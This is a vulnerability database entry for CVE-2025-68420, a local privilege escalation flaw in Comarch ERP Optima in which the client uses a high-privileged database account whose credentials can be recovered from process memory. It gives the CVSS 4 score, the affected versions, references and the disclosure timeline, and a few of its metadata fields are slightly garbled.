Privilege Escalation Vulnerability in Comarch ERP Optima
CVE-2025-68420

7.5HIGH

Key Information:

Vendor: Comarch
Status: Erp Optima
Vendor: CVE Published:; 14 May 2026

What is CVE-2025-68420?

The Comarch ERP Optima client exhibits a security flaw where it connects to a database utilizing a high privileged account, irrespective of the user-specific application account being used for login. This flaw allows a local attacker, who has control over the client process, to dump memory contents, which may include sensitive credentials. These credentials can then be exploited to gain unauthorized privileged access to the database, posing significant risks to data integrity and security. It is essential to ensure that the client application is configured properly to mitigate these vulnerabilities, as exploitation does not require an active user login. This issue has been remediated in version 2026.4.

Affected Version(s)

ERP Optima 0 < 2026.4

References

https://www.comarch.pl/erp/comarch-optima/

product

https://cert.pl/posts/2026/05/CVE-2025-68420/

third-party-advisory

CVSS V4

Score:

7.5

Severity:

HIGH

Confidentiality:

High

Integrity:

High

Availability:

Low

Attack Vector:

Local

Attack Complexity:

Low

Attack Required:

Physical

Privileges Required:

Undefined

User Interaction:

None

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
May 14, 2026
Vulnerability Reserved
Dec 17, 2025

Credit

Wojciech Giełda

CVE-2025-68420 Data

JSON